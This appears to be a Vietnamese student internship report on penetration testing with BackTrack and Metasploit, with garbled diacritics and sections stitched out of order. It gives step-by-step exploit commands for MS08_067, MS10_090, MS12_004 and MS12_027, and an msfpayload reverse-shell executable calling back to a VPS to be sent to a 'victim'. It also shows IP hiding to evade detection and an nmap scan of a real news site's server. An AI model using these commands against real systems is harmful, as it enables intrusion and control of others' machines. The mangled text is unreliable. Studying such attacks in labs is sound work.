Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
